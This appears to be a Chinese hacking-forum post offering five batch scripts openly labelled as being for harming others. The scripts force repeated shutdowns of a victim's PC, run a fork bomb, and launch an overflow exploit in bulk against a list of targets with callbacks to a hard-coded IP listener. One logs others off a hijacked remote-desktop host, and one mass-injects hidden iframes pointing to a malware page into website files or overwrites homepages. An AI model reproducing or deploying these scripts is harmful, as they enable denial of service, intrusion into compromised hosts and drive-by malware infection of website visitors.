|
第一个:让对方重启指定次数(害人专用)
--------------------------------------------------------------------------------
@echo off if not exist c:\1.txt echo. >c:\1.txt & goto err1 if not exist c:\2.txt echo. >c:\2.txt & goto err1 if not exist c:\3.txt echo. >c:\3.txt & goto err1 if not exist c:\4.txt echo. >c:\4.txt & goto err1 if not exist c:\5.txt echo. >c:\5.txt & goto err1 goto err2 :err1 shutdown -s -t 0 :err2
上面可以让对方电脑重启5次后不在重启
第二个:让别人内存OVER(逼他重启) @echo off start cmd %0 就这3行了
第三个: 批量自动溢出 @for /f %%i in (result.txt) do 42 %%i 58.44.89.158 521 先自己用NC监听端口,多开几个,然后指行,就自动溢出了
第四个:自动踢人(3389肉机保护自己专用) @echo off logoff 1 del log.bat logoff后面的1改成自己登陆的ID号,用query user查看
第五个:自动挂Ma改主页 @echo off cls rem 直接打批处理名字就有帮助 title 批量挂Ma,改首页(伤脑筋 QQ:447228437). color A set pan=%1 set ye=%2 set dai=%3 if "%pan%"=="" goto e1 if "%ye%"=="" goto e1 if "%dai%"=="" goto e1 if "%dai%"=="htm.txt" goto u1 forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE echo ^<iframe src="http://%dai%" width="0" height="0" frameborder="0"^> >>@path" echo. echo 代码全部插入完毕!!!! echo. pause goto e1 :u1 echo 您现在的操作将使%pan%盘下,全部名为%ye%的内容变为您要更改的内容. echo 这将是非常危险的,您真的要这样做? 回车却认,Ctrl+c取消操作. pause forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE copy %1\htm.txt @path /y" echo. echo 首页全部更改完必!!!!如果您发现没有替换成功,请将%ye%文件只读属性去掉. echo. pause :e1 echo. echo 本批处理只适用于2003系统,其他系统要使用,请将forfiles.exe拷贝至系统盘system32目录下 echo 用法:snj ^<搜索盘符^> ^<文件名^> ^<网马地址^> echo 例子:snj d:\ index.asp www.muma.com/mm.htm echo 批处理将自动添加^<iframe^>标记 echo. echo 如果您要更改全部网站的首页!请在批处理文件所在目录下,新建一个名为htm.txt的文本文件. echo 然后将要更改的代码加COPY到里面保存.然后将命令的^<网马地址^>项输入为htm.txt即可. echo 例子:snj d:\ index.asp htm.txt echo. echo 为了能准确无误执行批处理请最好先把记事本的"自动换行功能去掉",让命令保持在一行才能正确执行. echo. echo 使用此批处理造成一切后果本人概不负责,请大家谨慎使用! echo.
|